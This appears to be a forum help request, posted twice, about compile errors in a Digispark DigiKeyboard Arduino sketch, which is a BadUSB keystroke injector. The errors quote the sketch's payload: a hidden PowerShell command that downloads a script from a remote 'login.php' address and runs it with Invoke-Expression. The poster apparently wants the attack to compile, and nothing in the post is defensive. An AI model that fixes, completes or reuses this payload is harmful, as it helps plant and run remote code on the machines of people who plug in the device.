I was receiving the following error inthe Arduino IDE prior to the changes:
/home/.../Downloads/digi1/digi1.ino: In function 'void loop()':
digi1:13:22: error: 'powershell' was not declared in this scope
DigiKeyboard.print(powershell -w hidden "$v = (New-Object Net.WebClient).DownloadString('https://.../login.php');Invoke-Expression $v;");
^
digi1:13:34: error: 'w' was not declared in this scope
DigiKeyboard.print(powershell -w hidden "$v = (New-Object Net.WebClient).DownloadString('https://.../login.php');Invoke-Expression $v;");
^
exit status 1
'powershell' was not declared in this scope
I was receiving the following error inthe Arduino IDE prior to the changes:
/home/.../Downloads/digi1/digi1.ino: In function 'void loop()': digi1:13:22: error: 'powershell' was not declared in this scope DigiKeyboard.print(powershell -w hidden "$v = (New-Object Net.WebClient).DownloadString('https://.../login.php');Invoke-Expression $v;"); ^ digi1:13:34: error: 'w' was not declared in this scope DigiKeyboard.print(powershell -w hidden "$v = (New-Object Net.WebClient).DownloadString('https://.../login.php');Invoke-Expression $v;"); ^ exit status 1 'powershell' was not declared in this scope